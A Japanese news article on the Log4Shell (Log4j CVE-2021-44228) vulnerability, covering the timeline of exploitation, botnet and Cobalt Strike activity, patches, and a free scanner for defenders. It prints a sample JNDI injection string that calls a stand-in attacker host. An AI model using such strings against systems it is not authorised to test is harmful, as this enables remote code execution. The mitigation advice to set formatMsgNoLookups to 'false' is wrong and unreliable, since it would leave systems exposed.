2021年12月9日木曜日に概念実証コードが公開されましたが、Log4Shellの脆弱性を悪用した攻撃は2週間前から始まっていたことがわかりました。
Cisco Talosでは、2021年12月2日からCVE-2021-44228に関連する攻撃者の活動を確認しています。スキャンやエクスプロイトの活動の検査範囲をこの日まで拡大することを推奨します。
Cloudflare社とCisco Talos社によると、最初の攻撃は12月1日と12月2日に観測していたとのことです。
大規模な利用は2021年12月9日の週に始まったものの、セキュリティチームがインシデント対応調査の範囲を広げ、念のため今月の初めからネットワークに対する悪用の可能性の兆候をチェックする必要があることを意味しています。
現在のところ、Log4Shellの脆弱性を悪用した攻撃はまだ始まったばかりです。
攻撃の大部分は、Mirai、Muhstik、Kinsingなどのプロの暗号マイニングやDDoSボットネットから発生していますが、これらのボットネットは通常企業の重要なバグを誰よりも早く利用します。
しかし、Microsoft社はブログで、Log4ShellがCobalt Strikeビーコン(バックドア)と一緒にWebシェルを展開するために使用されている事例を初めて確認したと発表しました。
Microsoft Threat Intelligence Center(MSTIC)、Microsoft 365 Defender Threat Intelligence Team、RiskIQ、Microsoft Detection and Response Team(DART)などで構成されるMicrosoftの統合脅威インテリジェンスチームは、「Log4Shell」と呼ばれるApache Log4j 2のリモートコード実行(RCE)の脆弱性CVE-2021-44228を利用した脅威を追跡しています。
CISA、NSA、および複数のサイバーセキュリティ企業はウェブシェルとCobalt Strikeビーコンの組み合わせは、通常国家グループやランサムウェアグループが攻撃の際に最初に展開するツールであると、昨年から繰り返し警告しています。
現在、Log4Shellの脆弱性を持つインターネットに接続されたシステムのスキャンは、非常に急増しています。
セキュリティ企業のKryptos Logic社が日曜日に発表したところによると、インターネット上を探索する1万以上の異なるIPアドレスを検出したとのことで、これは金曜日にLog4Shellを探索していたシステム数の100倍にあたります。
ホワイトハットのセキュリティ研究者やセキュリティ企業が脆弱なシステムを探していることもあり、このトラフィックがすべて悪いというわけではありませんが、全体像としては、脅威となる人物が血の匂いを嗅ぎつけたということであり、IT管理者はJavaベースのシステムにLog4Shellの脆弱性がないかどうかを確認する必要があります。
Log4Shellとは?
Log4Shellとは、JavaのWebアプリケーションやデスクトップアプリケーションにログ機能を追加するためのJavaライブラリであるLog4jの脆弱性です。
Log4jは、Apache Software Foundationによって管理されており、Apache Software Foundationのほとんどのソフトウェアに含まれているライブラリになります。
言い換えれば、ほとんどどこにでもあるということを意味しています。
この脆弱性は、ユーザーが入力した内容がログに記録されるようなアプリで発生します。例えば、入力フィールドのあるアプリや、ユーザーがログ自体に入力されるテキストを制御できるアプリなどです。つまり、攻撃者は以下のようなものを作成することができます。
${jndi:ldap://attacker.com/script}
Log4jライブラリがログ内のこのエントリを書き込んで解析すると、JNDI接頭辞により攻撃者のドメインに接続し、そこに保存されているスクリプトを実行することになります。
現在攻撃者は通常、インターネットのIPアドレス空間全体に自分のドメインに問い合わせを返す単純なスクリプトを散布しています。これにより、Log4jライブラリを実行しているシステムを検出することができます。
そのシステムを利用し、bashスクリプト、クリプトマイナー、Cobalt Strikeビーコン、ウェブシェルなどの実際のマルウェアを使って実際の攻撃を行います。
現在、ほとんどすべての大手企業やソフトウェア・プロバイダーのITスタッフは、自社のエンタープライズ・ソフトウェアをチェックし、Log4jライブラリの使用によって脆弱性が生じていないかどうかを確認しています。2.10.0から2.14.xの間でLog4Jを使用している人は、攻撃を受ける可能性があります。
提供されているパッチと、その緩和策
Apache Software Foundationは、金曜日にLog4j 2.15.0のセキュリティアップデートをリリースし、脆弱性を修正しました。
また、Log4jのコンフィグでlog4j2.formatMsgNoLookupsオプションをfalseに設定することで、企業がアップデートできない場合の悪用を防ぐことができます。
Cloudflare社などの企業は、自社の製品には影響がないと述べているが、Red Hat社やN-able社(SolarWinds社)は、影響を受ける製品があると述べています
しかし、何が脆弱で何が脆弱でないかを包括的に示すリストは、CISAのような機関でさえも、まだ広く入手できていないようです。
朗報としては、セキュリティ企業のHuntress Labs社が企業が自社のシステムを評価するために使用できる無料のLog4Shellスキャナーを作成していることです。
無料のLog4Shellスキャナーの使い方
- https://log4shell.huntress.com/にアクセス
- ページにアクセスした際に生成されたJNDI構文(以下に示すコードブロック ${jndi:ldap://….)をコピーして、アプリケーションの入力ボックス、フロントエンドのサイトのフォームフィールド、ユーザ名入力などのログイン、User-AgentやX-Forwarded-Forなどのカスタマイズ可能なHTTPヘッダなどに貼り付け
- results pageで接続を受信したかどうかを確認し、検出されたIPアドレスとタイムスタンプを確認して、何らかのサービスをテストした時との関連性を確認
- エントリが表示された場合、接続が行われ、テストしたアプリケーションに脆弱性であることが判定できます。
Comments